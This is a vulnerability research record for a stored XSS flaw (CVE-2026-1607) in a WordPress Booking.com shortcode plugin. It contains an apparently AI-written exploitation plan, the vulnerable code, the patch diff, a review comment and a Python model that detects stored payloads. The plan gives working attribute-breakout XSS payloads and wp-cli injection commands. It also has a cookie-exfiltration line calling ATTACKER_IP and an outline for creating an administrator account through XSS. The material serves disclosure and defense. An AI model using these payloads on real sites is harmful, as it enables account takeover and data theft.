[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTv_05rUgz3cjet29tCTAW4CQ6P20KG_OxeQkCH1o7_A":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"source_links":35},"CVE-2026-1607","surbma-bookingcom-authenticated-contributor-stored-cross-site-scripting-via-shortcode","Surbma | Booking.com \u003C= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode","The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `surbma-bookingcom` shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","surbma-bookingcom-shortcode",null,"\u003C=2.1","2.1.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-13 14:39:51","2026-04-14 03:37:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F01280afb-4745-4f36-823e-ed794bb3353a?source=api-prod",1,[22,23],"readme.txt","surbma-bookingcom-shortcode.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-1607\n\n## 1. Vulnerability Summary\nThe **Surbma | Booking.com Shortcode** plugin (versions \u003C= 2.1) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the `surbma_bookingcom_shortcode_shortcode` function, which processes the `[surbma-bookingcom]` shortcode. The plugin accepts a user-defined attribute `param`, which is concatenated directly into a `\u003Cscript>` tag's `src` attribute without any sanitization or escaping (such as `esc_attr` or `esc_url`). This allows an attacker with Contributor-level permissions or higher to inject arbitrary HTML attributes or close the script tag entirely to execute malicious JavaScript.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress Post\u002FPage Editor (standard Gutenberg or Classic editor).\n- **Shortcode**: `[surbma-bookingcom]`\n- **Vulnerable Parameter**: `param`\n- **Authentication**: Required (Contributor role or higher). Contributor is the minimum role that can typically create posts and use shortcodes.\n- **Preconditions**: The plugin must be active. A user with the Contributor role must be able to save a post (even as a draft) and preview it, or an Administrator must view the published post.\n\n## 3. Code Flow\n1.  
**Entry Point**: The shortcode is registered in `surbma-bookingcom-shortcode.php`:\n    ```php\n    add_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );\n    ```\n2.  **Processing**: When a page containing the shortcode is rendered, WordPress calls `surbma_bookingcom_shortcode_shortcode($atts)`:\n    ```php\n    function surbma_bookingcom_shortcode_shortcode( $atts ) {\n        extract( shortcode_atts( array(\n            \"param\" => ''\n        ), $atts ) ); \u002F\u002F $param is extracted from $atts['param']\n        return '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n    }\n    ```\n3.  **Sink**: The `$param` variable is concatenated directly into the return string. Because it is not passed through `esc_attr()` or `esc_url()`, characters like `\"` and `>` can be used to break out of the HTML attribute and tag context.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited via the standard WordPress post creation\u002Fediting flow. It does **not** involve a custom AJAX or REST API endpoint provided by the plugin.\n- **Nonce Needed**: To create\u002Fsave a post as a Contributor, the standard WordPress `_wpnonce` for post creation is required.\n- **Acquisition**:\n    1.  The automated agent logs in as a Contributor.\n    2.  Navigate to `wp-admin\u002Fpost-new.php`.\n    3.  The `_wpnonce` is present in the page source (usually in the `wp.apiFetch` settings or a hidden input).\n    4.  The agent uses the standard `wp-cli` command `wp post create` to bypass the need for manual nonce handling during the injection phase.\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload that executes when an Administrator views the post.\n\n### Step-by-Step Plan:\n1.  **Inject via Post Creation**: Use `wp-cli` as a Contributor to create a post containing the malicious shortcode.\n2.  
**Payload Selection**:\n    -   **Attribute Breakout (use this as a Contributor)**: `param=' \" onerror=\"alert(origin)\" onload=\"alert(origin)\" '`\n        -   Result: `\u003Cscript ... src=\"...html? \" onerror=\"alert(origin)\" onload=\"alert(origin)\" \">\u003C\u002Fscript>`\n        -   The value contains no HTML tag, so `wp_kses_post()`, which WordPress applies on save for every role without `unfiltered_html` (Contributor included), stores it unchanged; the `\"` only becomes dangerous when the shortcode is rendered. Both handlers are registered because which one fires depends on how the browser treats a cross-origin `text\u002Fhtml` response fetched as a script (strict MIME checking or response blocking can turn the fetch into a load error).\n    -   **Tag Breakout (only for accounts with `unfiltered_html`, e.g. Administrator)**: `param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>'`\n        -   Result: `\u003Cscript ... src=\"...html?\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\">\u003C\u002Fscript>`\n        -   A Contributor cannot use this form: `wp_kses_post()` strips the `\u003Cscript>` and `\u003C\u002Fscript>` tags and rewrites the stray `>` as `&gt;` before the post is stored, leaving `param='\"&gt;alert(origin)'`, which breaks the tag but executes nothing.\n3.  **Trigger**: Navigate to the frontend URL of the newly created post while logged in as an Administrator.\n\n### HTTP Request Details (Simulating Preview\u002FSave):\nWhile `wp post create` is simpler, if testing the UI flow:\n- **URL**: `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fpost.php` (for existing) or `wp-admin\u002Fpost-new.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body Parameters**:\n    - `post_title`: `XSS Test`\n    - `content`: `[surbma-bookingcom param=' \" onerror=\"alert(origin)\" onload=\"alert(origin)\" ']`\n    - `action`: `editpost`\n    - `post_ID`: `[ID of the auto-draft that post-new.php created]`\n    - `post_type`: `post`\n    - `_wpnonce`: `[extracted_nonce]`\n\n## 6. Test Data Setup\n1.  **User**: Create a user with the `contributor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n2.  **Post**: Create the post as the contributor. Running with `--user=attacker` makes WP-CLI apply the same kses filters the editor would, so the attribute-breakout payload is the one to use here; `--post_status=publish` is a test-harness shortcut (a real Contributor can only submit the post as pending and rely on a reviewer opening it), chosen so the frontend URL can be fetched without a session.\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Booking Search\" --post_content=\"[surbma-bookingcom param=' \\\" onerror=\\\"alert(origin)\\\" onload=\\\"alert(origin)\\\" ']\" --user=attacker\n    ```\n\n## 7. 
Expected Results\n- When the page is rendered, the HTML source should contain:\n  ```html\n  \u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html? \" onerror=\"alert(origin)\" onload=\"alert(origin)\" \">\u003C\u002Fscript>\n  ```\n- The browser should execute the `alert(origin)` call from whichever handler fires. If the handler text appears entity-encoded or otherwise altered in the page, the payload did not survive the save-time filters and the stored content should be re-checked.\n\n## 8. Verification Steps\n1.  **Check Database Content**:\n    ```bash\n    wp post list --post_type=post --field=post_content | grep \"surbma-bookingcom\"\n    ```\n2.  **Verify Frontend Output**:\n    Fetch the post URL and confirm the event handler is emitted as a real attribute of the `\u003Cscript>` tag rather than inside the `src` value:\n    ```bash\n    # Get the URL of the last created post\n    POST_URL=$(wp post list --post_type=post --format=ids | xargs -n 1 wp post get --field=url | head -n 1)\n    # The handler must appear unescaped in the rendered HTML\n    curl -s \"$POST_URL\" | grep -o 'general.html?[^>]*onerror=\"alert(origin)\"'\n    # (The agent will then use browser_navigate and check for the alert)\n    ```\n\n## 9. Alternative Approaches\nIf `alert()` is blocked or hard to detect:\n- **Cookie Exfiltration**: ``param=' \" onerror=\"fetch(`http:\u002F\u002FATTACKER_IP\u002F?c=`+btoa(document.cookie))\" '`` (backticks keep the JavaScript string free of quotes that would end the attribute or the shortcode value). Note that WordPress sets its authentication cookies with `HttpOnly`, so `document.cookie` will not contain the session; payloads that act inside the victim's session, as below, are more useful.\n- **Admin User Creation**: If the target is an Administrator, inject a script that uses the REST API or `user-new.php` to create a new admin account (standard XSS-to-RCE\u002FAdmin chain). The script runs on the frontend, so it must first harvest a nonce, e.g. by fetching `wp-admin\u002Fuser-new.php` same-origin with the victim's cookies and reading it from the returned form.\n- **Attribute Injection vs. Tag Breakout**: The attribute form is the primary payload for this vulnerability, not a fallback, because it is the one a Contributor can store. Whether `onload` or `onerror` fires depends on how the browser handles the cross-origin `text\u002Fhtml` response fetched as a script, which is why both handlers are set. Tag breakout (`param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>'`) remains the simplest payload when the attacking account has `unfiltered_html`.","The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `surbma-bookingcom` shortcode in versions up to 2.1. 
This occurs because the `param` attribute is concatenated directly into a script tag's source URL without sanitization or escaping, allowing authenticated contributors to inject arbitrary JavaScript.","\u002F\u002F surbma-bookingcom-shortcode.php lines 28-33\nfunction surbma_bookingcom_shortcode_shortcode( $atts ) {\n\textract( shortcode_atts( array(\n\t\t\"param\" => ''\n\t), $atts ) );\n\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n}\nadd_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.0\u002Fsurbma-bookingcom-shortcode.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.1.1\u002Fsurbma-bookingcom-shortcode.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.0\u002Fsurbma-bookingcom-shortcode.php\t2020-02-10 13:24:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.1.1\u002Fsurbma-bookingcom-shortcode.php\t2026-04-12 14:58:34.000000000 +0000\n@@ -5,7 +5,7 @@\n Plugin URI: https:\u002F\u002Fsurbma.com\u002Fwordpress-plugins\u002F\n Description: A simple shortcode to include Booking.com search box into WordPress.\n \n-Version: 2.0\n+Version: 2.1.1\n \n Author: Surbma\n Author URI: https:\u002F\u002Fsurbma.com\u002F\n@@ -17,20 +17,29 @@\n *\u002F\n \n \u002F\u002F Prevent direct access to the plugin\n-if ( !defined( 'ABSPATH' ) ) {\n-\tdie( 'Good try! 
:)' );\n-}\n+defined( 'ABSPATH' ) || exit;\n \n \u002F\u002F Localization\n-function surbma_bookingcom_shortcode_init() {\n+add_action( 'init', function() {\n \tload_plugin_textdomain( 'surbma-bookingcom-shortcode', false, dirname( plugin_basename( __FILE__ ) ) . '\u002Flanguages\u002F' );\n-}\n-add_action( 'plugins_loaded', 'surbma_bookingcom_shortcode_init' );\n+} );\n \n-function surbma_bookingcom_shortcode_shortcode( $atts ) {\n-\textract( shortcode_atts( array(\n-\t\t\"param\" => ''\n-\t), $atts ) );\n-\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n-}\n-add_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );\n+add_shortcode( 'surbma-bookingcom', function( $atts ) {\n+\t$atts = shortcode_atts(\n+\t\tarray(\n+\t\t\t'param' => '',\n+\t\t),\n+\t\t$atts,\n+\t\t'surbma-bookingcom'\n+\t);\n+\n+\t$param = isset( $atts['param'] ) ? $atts['param'] : '';\n+\t$param = is_string( $param ) ? wp_strip_all_tags( $param ) : '';\n+\n+\t$url = 'https:\u002F\u002Fwww.booking.com\u002Fgeneral.html';\n+\tif ( '' !== $param ) {\n+\t\t$url .= '?' . rawurlencode( $param );\n+\t}\n+\n+\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"' . esc_url( $url, array( 'https' ) ) . '\">\u003C\u002Fscript>';\n+} );","1. Authenticate to the WordPress site as a user with Contributor-level permissions.\n2. Create a new post or page via the WordPress editor.\n3. Insert the `[surbma-bookingcom]` shortcode into the post content, supplying a malicious payload in the `param` attribute. A working payload uses HTML tag breakout: `[surbma-bookingcom param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>']`.\n4. Save the post as a draft or publish it.\n5. 
When an administrator or any other site visitor views the post, the browser will interpret the closing `\">\u003C\u002Fscript>` sequence, terminate the original Booking.com script tag, and execute the subsequent injected `\u003Cscript>` block. This tag-breakout form only survives saving when the account has the `unfiltered_html` capability; a Contributor's content is run through `wp_kses_post()` on save, which removes the `\u003Cscript>` tags and rewrites the stray `>` as `&gt;`, leaving the harmless `param='\"&gt;alert(origin)'`. A Contributor must instead store an attribute-breakout payload such as `[surbma-bookingcom param=' \" onerror=\"alert(origin)\" onload=\"alert(origin)\" ']`, which contains no tag for kses to strip and is rendered as `\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html? \" onerror=\"alert(origin)\" onload=\"alert(origin)\" \">\u003C\u002Fscript>`.","gemini-3-flash-preview","2026-04-16 15:59:00","2026-04-16 15:59:21",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F2.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.2.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsurbma-bookingcom-shortcode\u002Ftags"]
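Review bot: in the third hunk (`@@ -17,20 +17,29 @@`) of the 2.0 to 2.1.1 diff, `rawurlencode( $param )` encodes the whole attribute as a single token, so a value used the way the old code expected (appended after `general.html?` as a query string, e.g. `aid=123456&label=blog`) is emitted as `general.html?aid%3D123456%26label%3Dblog` and booking.com no longer receives separate parameters. The escaping itself is sound, since `"` and `>` cannot reach the `src` attribute once encoded and `esc_url( $url, array( 'https' ) )` pins the scheme, but it silently breaks the intended use. Parse the value into key/value pairs and rebuild the URL with `add_query_arg()` (ideally against an allowlist of parameter names), still wrapped in `esc_url()`; with the value encoded, the `wp_strip_all_tags()` call and the `isset( $atts['param'] )` check become redundant, because `shortcode_atts()` always returns the key.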
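Added example, not code from the plugin or from the research above: a Python model of the `surbma-bookingcom` shortcode sink as it behaves in 2.0 and after the 2.1.1 patch, together with a check for hunting stored breakout payloads in `post_content`. It assumes a simplified port of WordPress' `get_shortcode_atts_regex()` (no `stripcslashes()` and no unnamed attributes), uses `urllib.parse.quote(..., safe="")` as a stand-in for PHP `rawurlencode()`, models `wp_strip_all_tags()` with a crude tag regex, leaves `esc_url()` out because the encoded value contains nothing it would change, and runs on constructed sample rows standing in for `wp_posts`.

```python
"""Model of the surbma-bookingcom shortcode sink (2.0 vs 2.1.1) plus a stored-payload hunt.

Added example; assumptions: ATTR_RE is a simplified port of WordPress
get_shortcode_atts_regex(), quote(safe="") stands in for rawurlencode(),
esc_url() is not modelled, and SAMPLE_POSTS are constructed, not real data.
"""
import re
from urllib.parse import quote

BASE_URL = "https://www.booking.com/general.html"

# [surbma-bookingcom ...]: everything up to the closing bracket is the attribute text.
SHORTCODE_RE = re.compile(r"\[surbma-bookingcom\b([^\]]*)\]")

# Simplified port of get_shortcode_atts_regex(): name="v" | name='v' | name=v
ATTR_RE = re.compile(
    r"""([\w-]+)\s*=\s*"([^"]*)"(?:\s|$)"""
    r"""|([\w-]+)\s*=\s*'([^']*)'(?:\s|$)"""
    r"""|([\w-]+)\s*=\s*([^\s'"]+)(?:\s|$)"""
)

# Tokens that have no business in a query string but do break out of src="...".
BREAKOUT_RE = re.compile(r'["<>]|\bon\w+\s*=', re.IGNORECASE)


def parse_atts(att_text):
    """Return {name: value} for the shortcode's attributes (names lower-cased, as WP does)."""
    atts = {}
    for m in ATTR_RE.finditer(att_text.strip()):
        if m.group(1) is not None:
            atts[m.group(1).lower()] = m.group(2)
        elif m.group(3) is not None:
            atts[m.group(3).lower()] = m.group(4)
        elif m.group(5) is not None:
            atts[m.group(5).lower()] = m.group(6)
    return atts


def render_vulnerable(content):
    """2.0 behaviour: $param is concatenated straight into the src attribute."""
    def repl(m):
        param = parse_atts(m.group(1)).get("param", "")
        return f'<script type="text/javascript" src="{BASE_URL}?{param}"></script>'
    return SHORTCODE_RE.sub(repl, content)


def render_fixed(content):
    """2.1.1 behaviour: tags stripped, then the whole value rawurlencode()d as one token."""
    def repl(m):
        param = parse_atts(m.group(1)).get("param", "")
        param = re.sub(r"<[^>]*>", "", param)  # crude stand-in for wp_strip_all_tags()
        url = BASE_URL + (f"?{quote(param, safe='')}" if param else "")
        return f'<script type="text/javascript" src="{url}"></script>'
    return SHORTCODE_RE.sub(repl, content)


def hunt(posts):
    """Flag (post_id, param) pairs whose stored shortcode attribute carries a breakout token.

    `posts` is an iterable of (post_id, post_content) rows as pulled from wp_posts.
    """
    findings = []
    for post_id, content in posts:
        for m in SHORTCODE_RE.finditer(content):
            param = parse_atts(m.group(1)).get("param", "")
            if BREAKOUT_RE.search(param):
                findings.append((post_id, param))
    return findings


# Constructed sample rows standing in for `SELECT ID, post_content FROM wp_posts`.
SAMPLE_POSTS = [
    # legitimate use: a query string handed to booking.com
    (101, 'Find a room: [surbma-bookingcom param="aid=123456&label=blog"]'),
    # attribute breakout: survives wp_kses_post() because it contains no HTML tag
    (102, "[surbma-bookingcom param=' \" onerror=\"alert(origin)\" onload=\"alert(origin)\" ']"),
    # what wp_kses_post() leaves of a Contributor's tag-breakout attempt
    (103, "[surbma-bookingcom param='\"&gt;alert(origin)']"),
]

if __name__ == "__main__":
    for post_id, content in SAMPLE_POSTS:
        print(post_id, "vulnerable:", render_vulnerable(content))
        print(post_id, "fixed:     ", render_fixed(content))
    print("flagged:", hunt(SAMPLE_POSTS))
```

Running it shows post 102 producing a live `onerror`/`onload` attribute under the 2.0 logic and an inert `%22%20onerror%3D...` token under the 2.1.1 logic, and also shows the side effect of the patch on post 101, whose `aid=...&label=...` pair collapses into one encoded key. The `hunt()` output is the list to triage from a database export after upgrading, since the patch changes rendering but does not remove payloads already stored.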